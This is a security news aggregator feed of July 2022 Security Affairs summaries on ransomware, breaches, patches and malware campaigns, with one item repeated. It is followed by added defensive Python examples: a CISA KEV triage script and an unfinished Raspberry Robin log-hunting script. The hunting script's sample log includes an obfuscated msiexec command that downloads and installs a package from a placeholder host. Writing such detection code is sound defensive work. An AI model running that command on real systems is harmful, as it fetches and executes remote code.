The European Central Bank revealed that the hacking attempt took place recently, but the good news it that its experts […] ]]> 2022-07-12T22:07:16+00:00 https://securityaffairs.co/wordpress/133163/hacking/european-central-bank-hacking-attempt.html www.secnews.physaphae.fr/article.php?IdArticle=5677421 False None None None Security Affairs - Blog Secu Flaws in the ExpressLRS Protocol allow the takeover of drones The protocol for radio-controlled (RC) drones, named ExpressLRS, is affected by vulnerabilities that can allow device takeover. Researchers warn of vulnerabilities that affect the protocol for radio-controlled (RC) drones, named ExpressLRS, which can be exploited to take over unmanned vehicles. ExpressLRS is a high-performance open-source radio control link that provides a low latency radio control […] ]]> 2022-07-12T15:25:06+00:00 https://securityaffairs.co/wordpress/133146/hacking/expresslrs-protocol-flaws-drones-takeover.html www.secnews.physaphae.fr/article.php?IdArticle=5671249 False None None None Security Affairs - Blog Secu Microsoft announced the general availability of Windows Autopatch feature Microsoft announced the general availability of a feature called Autopatch that automatically updates Windows and Office software. Microsoft announced the general availability of a service called Autopatch that automates the process of managing and rolling out updates to Windows and Office software. The feature is available for Windows Enterprise E3 and E5 licenses, but Windows Education (A3) or Windows […] ]]> 2022-07-12T09:21:37+00:00 https://securityaffairs.co/wordpress/133139/security/microsoft-autopatch.html www.secnews.physaphae.fr/article.php?IdArticle=5667733 False None None None Security Affairs - Blog Secu Cloud-Based Cryptocurrency mining attacks abuse GitHub Actions and Azure VM Researchers investigated cloud-based cryptocurrency mining attacks targeting GitHub Actions and Azure VMs. 
Researchers from Trend Micro published a report that details cloud-based cryptocurrency mining attacks targeting GitHub Actions and Azure VMs and the threat actors behind them. Threat actors are attempting to compromise a large number of cloud-based systems to mine cryptocurrency with a significant […] ]]> 2022-07-12T07:26:21+00:00 https://securityaffairs.co/wordpress/133125/malware/cryptocurrency-mining-cloud-infrastructure.html www.secnews.physaphae.fr/article.php?IdArticle=5667156 False Threat None None Security Affairs - Blog Secu A fake job offer via LinkedIn allowed to steal $540M from Axie Infinity Threat actors used a fake job offer on LinkedIn to target an employee at Axie Infinity that resulted in the theft of $540 Million. In March, threat actors stole almost $625 million in Ethereum and USDC (a U.S. dollar pegged stablecoin) tokens from Axie Infinity's Ronin network bridge. The attack took place on March 23rd, but […] ]]> 2022-07-11T14:42:18+00:00 https://securityaffairs.co/wordpress/133113/cyber-crime/axie-infinity-hack-fake-job-offer.html www.secnews.physaphae.fr/article.php?IdArticle=5661536 False Threat None None Security Affairs - Blog Secu Anubis Networks is back with new C2 server A large-scale phishing campaign leveraging the Anubis Network is targeting Brazil and Portugal since March 2022. A large-scale phishing campaign is targeting Internet-end users in Brazil and Portugal since March 2022. Anubis Network is a C2 portal developed to control fake portals and aims to steal credentials to fully access the real systems. This C2 […] ]]> 2022-07-11T10:42:22+00:00 https://securityaffairs.co/wordpress/133115/hacking/anubis-networks-new-c2.html www.secnews.physaphae.fr/article.php?IdArticle=5659665 False None None None Security Affairs - Blog Secu BlackCat (aka ALPHV) Ransomware is Increasing Stakes up to $2,5M in Demands BlackCat (aka ALPHV) Ransomware gang introduced an advanced search by stolen victim's passwords, and confidential documents. 
The notorious cybercriminal syndicate BlackCat competes with Conti and Lockbit 3.0. They introduced an advanced search by stolen victim's passwords, and confidential documents leaked in the TOR network Resecurity (USA), a Los Angeles-based cybersecurity company protecting Fortune 500 companies, […] ]]> 2022-07-11T09:27:27+00:00 https://securityaffairs.co/wordpress/133107/cyber-crime/blackcat-alphv-ransomware-demands.html www.secnews.physaphae.fr/article.php?IdArticle=5659347 False Ransomware None None Security Affairs - Blog Secu Experts warn of the new 0mega ransomware operation BleepingComputer reported a new ransomware operation named 0mega that is targeting organizations worldwide. 0mega is a new ransomware operation that is targeting organizations worldwide using a double-extortion model, BleepingComputer reported. The ransomware operation has been active at least since May 2022 and already claimed to have breached multiple organizations. Victims of the ransomware reported that […] ]]> 2022-07-11T07:50:42+00:00 https://securityaffairs.co/wordpress/133098/malware/0mega-ransomware.html www.secnews.physaphae.fr/article.php?IdArticle=5658613 False Ransomware None None Security Affairs - Blog Secu Experts demonstrate how to unlock several Honda models via Rolling-PWN attack Bad news for the owners of several Honda models, the Rolling-PWN Attack vulnerability can allow unlocking their vehicles. 
A team of security Researchers Kevin2600 and Wesley Li from Star-V Lab independently discovered a flaw in Honda models, named the Rolling-PWN Attack vulnerability (CVE-2021-46145), that can allow unlocking their vehicles- A remote keyless entry system (RKE) […] ]]> 2022-07-10T17:40:13+00:00 https://securityaffairs.co/wordpress/133090/hacking/honda-rolling-pwn-attack.html www.secnews.physaphae.fr/article.php?IdArticle=5649896 False Vulnerability None None Security Affairs - Blog Secu French telephone operator La Poste Mobile suffered a ransomware attack French virtual mobile telephone operator La Poste Mobile was hit by a ransomware attack that impacted administrative and management services.  The ransomware attack hit the virtual mobile telephone operator La Poste Mobile on July 4 and paralyzed administrative and management services.  The company pointed out that threat actors may have accessed data of its customers, […] ]]> 2022-07-10T16:07:44+00:00 https://securityaffairs.co/wordpress/133080/cyber-crime/la-poste-mobile-ransomware.html www.secnews.physaphae.fr/article.php?IdArticle=5648528 False Ransomware,Threat None None Security Affairs - Blog Secu Security Affairs newsletter Round 373 by Pierluigi Paganini A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs for free in your email box. 
Apple Lockdown Mode will protect users against highly targeted cyberattacks Fortinet addressed multiple vulnerabilities in several products Rozena backdoor delivered by exploiting the Follina bug Ongoing Raspberry Robin campaign leverages […] ]]> 2022-07-10T14:41:29+00:00 https://securityaffairs.co/wordpress/133075/breaking-news/security-affairs-newsletter-round-373-by-pierluigi-paganini.html www.secnews.physaphae.fr/article.php?IdArticle=5647150 False None None 5.0000000000000000 Security Affairs - Blog Secu Apple Lockdown Mode will protect users against highly targeted cyberattacks Apple plans to introduce a security feature, called Lockdown Mode, to protect its users against “highly targeted cyberattacks.” The recent wave of sophisticated attacks against Apple users (i.e. Pegasus, DevilsTongue, and Hermit) urged the tech giant to develop a new security feature, called Lockdown Mode, to protect its users against highly targeted cyberattacks. The new feature will be implemented in iOS 16, iPadOS […] ]]> 2022-07-09T16:53:07+00:00 https://securityaffairs.co/wordpress/133065/mobile-2/apple-lockdown-mode.html www.secnews.physaphae.fr/article.php?IdArticle=5631802 False Cloud APT 37 None Security Affairs - Blog Secu Fortinet addressed multiple vulnerabilities in several products Fortinet released security patches to address multiple High-Severity vulnerabilities in several products of the vendor. Fortinet addressed multiple vulnerabilities in several products of the vendor. Impacted products are FortiADC, FortiAnalyzer, FortiManager, FortiOS, FortiProxy, FortiClient, FortiDeceptor, FortiEDR, FortiNAC, FortiSwitch, FortiRecorder, and FortiVoiceEnterprise. 
Four of the fixed issues have been rated as a “high” severity, they are […] ]]> 2022-07-09T13:17:53+00:00 https://securityaffairs.co/wordpress/133059/security/fortinet-multiple-issues-several-products.html www.secnews.physaphae.fr/article.php?IdArticle=5629585 False None None None Security Affairs - Blog Secu Previously undocumented Rozena backdoor delivered by exploiting the Follina bug Threat actors are exploiting the disclosed Follina Windows vulnerability to distribute the previously undocumented Rozena backdoor. Fortinet FortiGuard Labs researchers observed a phishing campaign that is leveraging the recently disclosed Follina security vulnerability (CVE-2022-30190, CVSS score 7.8) to distribute a previously undocumented backdoor on Windows systems. The Follina issue is a remote code execution vulnerability […] ]]> 2022-07-09T12:36:19+00:00 https://securityaffairs.co/wordpress/133051/hacking/follina-bug-rozena-backdoor.html www.secnews.physaphae.fr/article.php?IdArticle=5628846 False Vulnerability None None Security Affairs - Blog Secu Ongoing Raspberry Robin campaign leverages compromised QNAP devices Cybereason researchers are warning of a wave of attacks spreading the wormable Windows malware Raspberry Robin. Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary, the malware propagates through removable USB devices. The malicious code uses Windows Installer to reach out to QNAP-associated domains and download a malicious DLL. The malware uses […] ]]> 2022-07-09T10:04:58+00:00 https://securityaffairs.co/wordpress/133039/cyber-crime/raspberry-robin-infection-attacks.html www.secnews.physaphae.fr/article.php?IdArticle=5626635 False Malware None None Security Affairs - Blog Secu Evolution of the LockBit Ransomware operation relies on new techniques Experts documented the evolution of the LockBit ransomware that leverages multiple techniques to infect targets and evade detection. 
The Cybereason Global Security Operations Center (GSOC) Team published the Cybereason Threat Analysis Reports that investigates the threat landscape and provides recommendations to mitigate their attacks. The researchers focused on the evolution of the Lockbit ransomware, they detailed two infections occurring […] ]]> 2022-07-09T04:59:16+00:00 https://securityaffairs.co/wordpress/133027/cyber-crime/lockbit-2-0-evolution.html www.secnews.physaphae.fr/article.php?IdArticle=5622937 False Ransomware,Threat None None Security Affairs - Blog Secu Cisco fixed a critical arbitrary File Overwrite flaw in Enterprise Communication solutions Cisco fixed a critical vulnerability in the Cisco Expressway series and TelePresence Video Communication Server (VCS) products. Cisco released security patches to address a critical vulnerability, tracked as CVE-2022-20812 (CVSS score of 9.0), in the Expressway series and TelePresence Video Communication Server (VCS). A remote attacker can trigger the flaw to overwrite files on the […] ]]> 2022-07-08T18:41:45+00:00 https://securityaffairs.co/wordpress/133020/security/cisco-cisco-expressway-flaw.html www.secnews.physaphae.fr/article.php?IdArticle=5615456 False Vulnerability None None Security Affairs - Blog Secu Emsisoft: Victims of AstraLocker and Yashma ransomware can recover their files for free Emsisoft has released a free decryption tool that allows victims of the AstraLocker and Yashma ransomware to recover their files without paying a ransom. Cybersecurity firm Emsisoft released a free decryptor tool that allows victims of the AstraLocker and Yashma ransomware to recover their files without paying a ransom. 
The security firm states that the […] ]]> 2022-07-08T14:04:16+00:00 https://securityaffairs.co/wordpress/133014/malware/emsisoft-astralocker-yashma-decryptor.html www.secnews.physaphae.fr/article.php?IdArticle=5611884 False Ransomware,Tool None None Security Affairs - Blog Secu Discussing the risks of bullying for anonymous social app NGL This is a transcription of my complete interview with the program NEWSFEED at TRT, during which we discussed NGL software and the risks of bullying. Why are anonymous social apps like NGL cause for concern? What exactly makes them dangerous for minors? We have long debated the potential impact of social media on the mental […] ]]> 2022-07-08T10:59:40+00:00 https://securityaffairs.co/wordpress/133006/social-networks/anonymous-social-app-ngl-risks.html www.secnews.physaphae.fr/article.php?IdArticle=5609073 False None None None Security Affairs - Blog Secu Russian Cybercrime Trickbot Group is systematically attacking Ukraine The operators behind the TrickBot malware are systematically targeting Ukraine since the beginning of the war in February 2022. IBM researchers collected evidence indicating that the Russia-based cybercriminal Trickbot group (aka Wizard Spider, DEV-0193, ITG23) has been systematically attacking Ukraine since the beginning of the Russian invasion of the country. Since February, the Conti ransomware […] ]]> 2022-07-08T10:25:18+00:00 https://securityaffairs.co/wordpress/132999/cyber-crime/trickbot-systematically-attacking-ukraine.html www.secnews.physaphae.fr/article.php?IdArticle=5609074 False Ransomware,Malware None None Security Affairs - Blog Secu New Checkmate ransomware target QNAP NAS devices Taiwanese vendor QNAP wars of a new strain of ransomware, dubbed Checkmate, that is targeting its NAS devices. The Taiwanese vendor QNAP is warning of a new family of ransomware targeting its NAS devices using weak passwords. 
Threat actors are targeting devices exposed online with the SMB service enabled, they perform brute-force attacks against accounts […] ]]> 2022-07-08T07:23:07+00:00 https://securityaffairs.co/wordpress/132989/malware/checkmate-ransomware-targets-qnap-nas.html www.secnews.physaphae.fr/article.php?IdArticle=5606964 False Ransomware,Threat None None Security Affairs - Blog Secu Large-scale cryptomining campaign is targeting the NPM JavaScript package repository Researchers uncovered a large-scale cryptocurrency mining campaign targeting the NPM JavaScript package repository. Checkmarx researchers spotted a new large-scale cryptocurrency mining campaign, tracked as CuteBoi, that is targeting the NPM JavaScript package repository. Threat actors behind the campaign published 1,283 malicious modules in the repository and used over 1,000 different user accounts. The researchers uncovered […] ]]> 2022-07-07T20:08:30+00:00 https://securityaffairs.co/wordpress/132983/cyber-crime/cuteboi-cryptomining-campaign-npm.html www.secnews.physaphae.fr/article.php?IdArticle=5599211 False Threat None None Security Affairs - Blog Secu North Korea-linked APTs use Maui Ransomware to target the Healthcare industry US authorities have issued a joint advisory warning of North Korea-linked APTs using Maui ransomware in attacks against the Healthcare sector. The FBI, CISA, and the U.S. Treasury Department issued a joint advisory that warn of North-Korea-linked threat actors using Maui ransomware in attacks aimed at organizations in the Healthcare sector. “The Federal Bureau of […] ]]> 2022-07-07T13:49:58+00:00 https://securityaffairs.co/wordpress/132978/malware/maui-ransomware-joint-alert.html www.secnews.physaphae.fr/article.php?IdArticle=5594661 False Ransomware,Threat None None Security Affairs - Blog Secu ENISA released the Threat Landscape Methodology I’m proud to announce that the European Union Agency for Cybersecurity, ENISA, has released the Threat Landscape Methodology. 
Policy makers, risk managers and information security practitioners need up-to-date and accurate information on the current threat landscape, supported by threat intelligence. The EU Agency for Cybersecurity (ENISA) Threat Landscape report has been published on an annual […] ]]> 2022-07-07T10:16:53+00:00 https://securityaffairs.co/wordpress/132973/security/enis-athreat-landscape-methodology.html www.secnews.physaphae.fr/article.php?IdArticle=5592779 False Threat None None Security Affairs - Blog Secu OrBit, a new sophisticated Linux malware still undetected Cybersecurity researchers warn of new malware, tracked as OrBit, which is a fully undetected Linux threat. Cybersecurity researchers at Intezer have uncovered a new Linux malware, tracked as OrBit, that is still undetected. The malware can be installed as a volatile implant either by achieving persistence on the compromised systems. The malware implements advanced evasion […] ]]> 2022-07-07T09:34:15+00:00 https://securityaffairs.co/wordpress/132966/hacking/orbit-linux-malware.html www.secnews.physaphae.fr/article.php?IdArticle=5592154 False Malware None None Security Affairs - Blog Secu OpenSSL version 3.0.5 fixes a flaw that could potentially lead to RCE The development team behind the OpenSSL project fixed a high-severity bug in the library that could potentially lead to remote code execution. The maintainers of the OpenSSL project fixed a high-severity heap memory corruption issue, tracked as CVE-2022-2274, affecting the popular library. 
This bug makes the RSA implementation with 2048 bit private keys incorrect on such machines and triggers […] ]]> 2022-07-07T07:50:59+00:00 https://securityaffairs.co/wordpress/132939/security/openssl-3-0-5-fixes-rce.html www.secnews.physaphae.fr/article.php?IdArticle=5590901 False Guideline None None Security Affairs - Blog Secu Marriott International suffered a new data breach, attackers stole 20GB of data Hotel chain Marriott International suffered a new data breach, a threat actor has stolen 20GB from the company. Hotel chain Marriott International confirmed it has suffered a new data breach after a threat actor stole 20GB of files from one of its properties. The attacker compromised the network at the BWI Airport Marriott Maryland  (BWIA), […] ]]> 2022-07-06T23:08:11+00:00 https://securityaffairs.co/wordpress/132943/data-breach/marriott-new-data-breach.html www.secnews.physaphae.fr/article.php?IdArticle=5585378 False Data Breach,Threat None None Security Affairs - Blog Secu Cyberattacks against law enforcement are on the rise Experts observed an increase in malicious activity targeting law enforcement agencies at the beginning of Q2 2022. Resecurity, a Los Angeles-based cybersecurity company protecting Fortune 500 companies worldwide, has registered an increase in malicious activity targeting law enforcement agencies at the beginning of Q2 2022. Threat actors are hacking email and other accounts which belong […] ]]> 2022-07-06T17:34:14+00:00 https://securityaffairs.co/wordpress/132929/cyber-crime/cyberattacks-against-law-enforcement.html www.secnews.physaphae.fr/article.php?IdArticle=5581263 False Threat None None Security Affairs - Blog Secu Less popular, but very effective, Red-Teaming Tool BRc4 used in attacks in the wild Threat actors are abusing legitimate adversary simulation software BRc4 in their campaigns to evade detection. 
Researchers from Palo Alto Networks Unit 42 discovered that a sample uploaded to the VirusTotal database on May 19, 2022 and considered benign by almost all the antivirus, was containing a payload associated with Brute Ratel C4 (BRc4), a new red-teaming and […] ]]> 2022-07-06T15:20:36+00:00 https://securityaffairs.co/wordpress/132922/hacking/brc4-used-in-attacks.html www.secnews.physaphae.fr/article.php?IdArticle=5579981 False Tool None None Security Affairs - Blog Secu New Hive ransomware variant is written in Rust and use improved encryption method Hive ransomware operators have improved their file-encrypting module by migrating to Rust language and adopting a more sophisticated encryption method. The operators of the Hive ransomware upgraded their malware by migrating the malware to the Rust language and implementing a more sophisticated encryption method, Microsoft researchers warn. “The upgrades in the latest variant are effectively […] ]]> 2022-07-06T09:38:38+00:00 https://securityaffairs.co/wordpress/132914/malware/hive-ransomware-new-variant.html www.secnews.physaphae.fr/article.php?IdArticle=5576358 False Ransomware,Malware None None Security Affairs - Blog Secu Malicious NPM packages used to grab data from apps, websites Researchers from ReversingLabs discovered tens of malicious NPM packages stealing data from apps and web forms. Researchers from ReversingLabs discovered a couple of dozen NPM packages that included malicious code designed to steal data from apps and web forms on websites that included the modules. 
The malicious NPM modules were delivered as part of a […] ]]> 2022-07-06T06:59:29+00:00 https://securityaffairs.co/wordpress/132904/malware/fake-npm-packages-stealing-data.html www.secnews.physaphae.fr/article.php?IdArticle=5574604 False None None None Security Affairs - Blog Secu Iranian Fars News Agency claims cyberattack on a company involved in the construction of Tel Aviv metro Iran's Fars News Agency reported that a massive cyberattack hit operating systems and servers of the Tel Aviv Metro. Iran's Fars News Agency reported on Monday that operating systems and servers of the Tel Aviv Metro were hit by a massive cyberattack. The rail system is still under construction and according to The Jerusalem Post, […] ]]> 2022-07-05T14:59:54+00:00 https://securityaffairs.co/wordpress/132897/hacking/tel-aviv-metro-company-attacked.html www.secnews.physaphae.fr/article.php?IdArticle=5563581 False None None None Security Affairs - Blog Secu Cyber Police of Ukraine arrested 9 men behind phishing attacks on Ukrainians attempting to capitalize on the ongoing conflict The Cyber Police of Ukraine arrested nine members of a cybercriminal gang that has stolen 100 million hryvnias via phishing attacks. The Cyber Police of Ukraine arrested nine members of a cybercriminal organization that stole 100 million hryvnias via phishing attacks. The crooks created more than 400 phishing sites for obtaining the banking data of […] ]]> 2022-07-05T14:29:21+00:00 https://securityaffairs.co/wordpress/132891/cyber-crime/cyber-police-of-ukraine-phishing.html www.secnews.physaphae.fr/article.php?IdArticle=5563582 False None None None Security Affairs - Blog Secu Threat actors compromised British Army \'s Twitter, YouTube accounts to promote crypto scams Threat actors compromised the Twitter and YouTube accounts of the British Army to promote online crypto scams. The Twitter and YouTube accounts of the British Army were used to promote NFT and other crypto scams. 
The YouTube account was used to transmit an older Elon Musk clip that attempts to trick users into visiting cryptocurrency scam […] ]]> 2022-07-05T09:17:05+00:00 https://securityaffairs.co/wordpress/132876/hacking/british-army-accounts-hacked.html www.secnews.physaphae.fr/article.php?IdArticle=5559133 False None None None Security Affairs - Blog Secu AstraLocker ransomware operators shut down their operations AstraLocker ransomware operators told BleepingComputer they’re shutting down their operations and are releasing decryptors. AstraLocker ransomware operators told BleepingComputer they’re shutting down the operation and provided decryptors to the VirusTotal malware analysis platform. AstraLocker is based on the source code of the Babuk Locker (Babyk) ransomware that was leaked online on June 2021. BleepingComputer tested the […] ]]> 2022-07-05T07:44:27+00:00 https://securityaffairs.co/wordpress/132871/malware/astralocker-ransomware-shut-down.html www.secnews.physaphae.fr/article.php?IdArticle=5558384 False Ransomware,Malware None None Security Affairs - Blog Secu Google fixes the fourth Chrome zero-day in 2022 Google addressed a high-severity zero-day Chrome vulnerability actively exploited in the wild, it is the fourth zero-day patched in 2022. Google has released Chrome 103.0.5060.114 for Windows to fix a high-severity zero-day Chrome vulnerability, tracked as CVE-2022-2294, which is actively exploited in the wild. The flaw is a heap buffer overflow that resides in the […] ]]> 2022-07-04T21:16:22+00:00 https://securityaffairs.co/wordpress/132863/hacking/4th-chrome-zero-day.html www.secnews.physaphae.fr/article.php?IdArticle=5554822 True Vulnerability None None Security Affairs - Blog Secu Data of a billion Chinese residents available for sale on a cybercrime forum Threat actors claim to have breached a database belonging to Shanghai police and stole the data of a billion Chinese residents. 
Unknown threat actors claim to have obtained the data of a billion Chinese residents after breaching a database of the Shanghai police. If the incident is confirmed, this data breach is the largest one […]
2022-07-04T18:37:06+00:00 | https://securityaffairs.co/wordpress/132860/data-breach/chinese-residents-data-hacking-forum.html | www.secnews.physaphae.fr/article.php?IdArticle=5568431 | tags: Data Breach, Threat

Security Affairs - Blog Secu: Data of a billion Chinese residents available for sale on the dark web
Threat actors claim to have breached a database belonging to the Shanghai police and stolen the data of a billion Chinese residents. Unknown threat actors claim to have obtained the data of a billion Chinese residents after breaching a database of the Shanghai police. If the incident is confirmed, this data breach is the largest one […]
2022-07-04T18:37:06+00:00 | https://securityaffairs.co/wordpress/132860/data-breach/chinese-residents-data-dark-web.html | www.secnews.physaphae.fr/article.php?IdArticle=5553246 | tags: Data Breach, Threat

Security Affairs - Blog Secu: Popular Django web framework affected by a SQL Injection flaw. Upgrade it now!
The development team behind the Django Project has addressed a high-severity SQL injection flaw in the framework. Django is a free and open-source, Python-based web framework that follows the model–template–views (MTV) architectural pattern and is maintained by the independent Django Software Foundation. The latest releases of the framework, Django 4.0.6 and 3.2.14, address a high-severity SQL […]
2022-07-04T14:49:21+00:00 | https://securityaffairs.co/wordpress/132853/security/django-framework-sql-injection.html | www.secnews.physaphae.fr/article.php?IdArticle=5551635

Security Affairs - Blog Secu: Unfaithful HackerOne employee steals bug reports to claim additional bounties
Bug bounty platform HackerOne disclosed that a former employee improperly accessed security reports and used them to claim additional bounties. The vulnerability coordination and bug bounty platform HackerOne disclosed that a former employee improperly accessed security reports submitted by white-hat hackers and used them to claim additional bounties. The investigation started on June 22nd, 2022, when a customer asked the […]
2022-07-04T09:44:23+00:00 | https://securityaffairs.co/wordpress/132846/cyber-crime/hackerone-incident.html | www.secnews.physaphae.fr/article.php?IdArticle=5549291 | tags: Vulnerability

Security Affairs - Blog Secu: Threat Report Portugal: Q2 2022
The Threat Report Portugal: Q2 2022 compiles data collected on the malicious campaigns that occurred from March to June, Q2, 2022. The Portuguese Abuse Open Feed 0xSI_f33d is an open sharing database able to collect indicators from multiple sources, developed and maintained by Segurança-Informática. The feed is based on automatic searches and is supported by a […]
2022-07-04T08:05:41+00:00 | https://securityaffairs.co/wordpress/132842/security/threat-report-portugal-q2-2022.html | www.secnews.physaphae.fr/article.php?IdArticle=5548929 | tags: Threat

Security Affairs - Blog Secu: CISA orders federal agencies to patch CVE-2022-26925 by July 22
The US Cybersecurity and Infrastructure Security Agency (CISA) has re-added the CVE-2022-26925 Windows LSA flaw to its Known Exploited Vulnerabilities Catalog. In May, CISA had removed the CVE-2022-26925 Windows LSA vulnerability from the catalog because of Active Directory (AD) certificate authentication problems observed after installation of Microsoft’s May 2022 Patch Tuesday security updates. “CISA […]
2022-07-04T07:16:39+00:00 | https://securityaffairs.co/wordpress/132830/security/cisa-orders-patch-cve-2022-26925.html | www.secnews.physaphae.fr/article.php?IdArticle=5548501 | tags: Vulnerability

Security Affairs - Blog Secu: Tens of Jenkins plugins are affected by zero-day vulnerabilities
The Jenkins security team disclosed tens of flaws affecting 29 plugins for the Jenkins automation server; most of them are yet to be patched. Jenkins is the most popular open-source automation server; it is maintained by CloudBees and the Jenkins community. The automation server helps developers build, test and deploy their applications; it has hundreds of thousands […]
2022-07-03T21:15:49+00:00 | https://securityaffairs.co/wordpress/132836/security/jenkins-plugins-zero-day-flaws.html | www.secnews.physaphae.fr/article.php?IdArticle=5541067

Security Affairs - Blog Secu: Microsoft: Raspberry Robin worm already infected hundreds of networks
Microsoft announced that the Windows worm Raspberry Robin has already infected the networks of hundreds of organizations. Raspberry Robin is a Windows worm discovered by cybersecurity researchers at Red Canary; the malware propagates through removable USB devices. The malicious code uses Windows Installer to reach out to QNAP-associated domains and download a malicious DLL. The […]
2022-07-03T17:32:54+00:00 | https://securityaffairs.co/wordpress/132826/malware/microsoft-raspberry-robin-spreading.html | www.secnews.physaphae.fr/article.php?IdArticle=5537884 | tags: Malware

Security Affairs - Blog Secu: Security Affairs newsletter Round 372 by Pierluigi Paganini
A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs, free in your inbox. In this round: The role of Social Media in modern society – Social Media Day 22 interview; Experts shared PoC exploit code for RCE in Zoho ManageEngine ADAudit Plus tool; A ransomware attack […]
2022-07-03T16:10:18+00:00 | https://securityaffairs.co/wordpress/132822/breaking-news/security-affairs-newsletter-round-372-by-pierluigi-paganini.html | www.secnews.physaphae.fr/article.php?IdArticle=5537086 | tags: Ransomware, Tool

Security Affairs - Blog Secu: Half of actively exploited zero-day issues in H1 2022 are variants of previous flaws
Google Project Zero states that in H1 2022 at least half of the zero-day issues exploited in attacks were variants of older flaws that had not been properly fixed. Google Project Zero researcher Maddie Stone published a blog post that summarizes her talk at the FIRST conference in June 2022, titled “0-day In-the-Wild Exploitation in 2022…so […]
2022-07-03T13:31:15+00:00 | https://securityaffairs.co/wordpress/132813/security/h1-2022-zero-day-variants-previous-flaws.html | www.secnews.physaphae.fr/article.php?IdArticle=5534696
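The CISA item above describes the mechanism behind the July 22 deadline: a CVE is listed in the Known Exploited Vulnerabilities catalog with a due date, and agencies must remediate it by then. The script below, an added example that is not code from CISA or Security Affairs, shows how a practitioner would triage an asset inventory against that catalog. It assumes the layout of the public KEV JSON feed (a top-level "vulnerabilities" list whose entries carry "cveID", "dateAdded", "dueDate" and "requiredAction") and works from a constructed snapshot embedded in the code rather than downloading the live feed; the host names, the dateAdded value and the placeholder CVE-0000-0000 are assumptions.

```python
"""Triage an asset inventory against a CISA KEV catalog snapshot.

Added example, not code from CISA or Security Affairs. It assumes the layout
of the public KEV JSON feed (a top-level "vulnerabilities" list whose entries
carry "cveID", "dateAdded", "dueDate" and "requiredAction") and works from a
constructed snapshot embedded below rather than downloading the live feed.
"""
import json
from datetime import date

# Constructed KEV snapshot. The CVE, product and 2022-07-22 due date come from
# the article above; dateAdded and the descriptive strings are placeholders.
KEV_SNAPSHOT = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "2022.07.01",
    "count": 1,
    "vulnerabilities": [
        {
            "cveID": "CVE-2022-26925",
            "vendorProject": "Microsoft",
            "product": "Windows",
            "vulnerabilityName": "Microsoft Windows LSA Spoofing Vulnerability",
            "dateAdded": "2022-07-01",
            "shortDescription": "Placeholder description for the sample entry.",
            "requiredAction": "Apply updates per vendor instructions.",
            "dueDate": "2022-07-22",
        }
    ],
})

# Constructed inventory: host -> CVEs a vulnerability scanner reported on it.
# CVE-0000-0000 is a deliberately invalid placeholder that is not in the catalog.
INVENTORY = {
    "dc01.corp.example": ["CVE-2022-26925", "CVE-0000-0000"],
    "web01.corp.example": ["CVE-0000-0000"],
}


def load_kev(raw_json: str) -> dict:
    """Index a KEV catalog document by CVE ID for constant-time lookups."""
    catalog = json.loads(raw_json)
    return {entry["cveID"]: entry for entry in catalog["vulnerabilities"]}


def triage(inventory: dict, kev: dict, today: date, warn_days: int = 7) -> list:
    """Report every inventory CVE that is in KEV with its status relative to today.

    OVERDUE:   the catalog due date has passed.
    DUE_SOON:  due within warn_days.
    SCHEDULED: due later than that.
    CVEs absent from KEV are not reported: KEV is a floor for prioritisation,
    not a complete list of what needs patching.
    """
    findings = []
    for host, cves in inventory.items():
        for cve in cves:
            entry = kev.get(cve)
            if entry is None:
                continue
            due = date.fromisoformat(entry["dueDate"])
            days_left = (due - today).days
            if days_left < 0:
                status = "OVERDUE"
            elif days_left <= warn_days:
                status = "DUE_SOON"
            else:
                status = "SCHEDULED"
            findings.append({
                "host": host,
                "cve": cve,
                "due": entry["dueDate"],
                "days_left": days_left,
                "status": status,
                "action": entry["requiredAction"],
            })
    # Most urgent first, then by host so the report order is stable.
    findings.sort(key=lambda f: (f["days_left"], f["host"]))
    return findings


if __name__ == "__main__":
    kev = load_kev(KEV_SNAPSHOT)
    for f in triage(INVENTORY, kev, today=date(2022, 7, 20)):
        print(f"{f['status']:9} {f['host']:20} {f['cve']} due {f['due']} ({f['days_left']:+d} days)")
```

Run against the snapshot on 2022-07-20 the report shows dc01.corp.example as DUE_SOON with two days left; on 2022-07-25 the same host is OVERDUE. To use it for real, replace KEV_SNAPSHOT with the contents of the catalog JSON published on cisa.gov and INVENTORY with the scanner export, and keep in mind that a CVE being removed and re-added, as happened with CVE-2022-26925, resets the due date, so re-run the triage after every catalog update rather than caching the result.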
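The Raspberry Robin item above gives one concrete, detectable behaviour: Windows Installer is used to reach out to a remote domain and fetch a malicious DLL. Windows Installer's command-line front end is msiexec.exe, and handing it an http(s) URL as the package argument makes it download and run the package. The hunt below is an added example, not code from Microsoft, Red Canary or Security Affairs; it assumes a pipe-delimited process-creation export with the fields timestamp|host|parent_image|image|command_line, constructed inline, and the domain qnap-device.example is a placeholder rather than a real indicator. A Sysmon Event ID 1 or EDR export would need its own parse_line(), everything else carries over.

```python
"""Hunt process-creation logs for Windows Installer fetching a remote package.

Added example, not code from Microsoft, Red Canary or Security Affairs. It
assumes a pipe-delimited process-creation export with the fields
timestamp|host|parent_image|image|command_line, constructed below; a Sysmon
Event ID 1 or EDR export needs its own parser in place of parse_line().
"""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed sample log. The first line imitates the behaviour the article
# describes: msiexec.exe launched with an http URL on a non-standard port as
# its package argument, with mixed-case obfuscation in the command line.
# qnap-device.example is a placeholder, not a real indicator of compromise.
SAMPLE_LOG = [
    r"2022-07-03T10:01:02Z|ws-042|C:\Windows\System32\cmd.exe|C:\Windows\System32\msiexec.exe|MsIeXeC /Q /I hTtP://qnap-device.example:8080/update.msi",
    r"2022-07-03T10:05:00Z|ws-042|C:\Windows\explorer.exe|C:\Windows\System32\msiexec.exe|msiexec.exe /i C:\Users\alice\Downloads\tool.msi",
    r'2022-07-03T10:06:00Z|ws-017|C:\Windows\explorer.exe|C:\Program Files\Mozilla Firefox\firefox.exe|"C:\Program Files\Mozilla Firefox\firefox.exe" https://example.org/',
    r"2022-07-03T10:07:00Z|srv-01|C:\Windows\System32\services.exe|C:\Windows\System32\msiexec.exe|C:\Windows\System32\MsiExec.exe /V",
    "malformed line with too few fields",
]

# Case-insensitive so hTtP:// and HTTPS:// are caught as well as http://.
_URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    ts: str
    host: str
    parent_image: str
    image: str
    cmdline: str


def parse_line(line: str):
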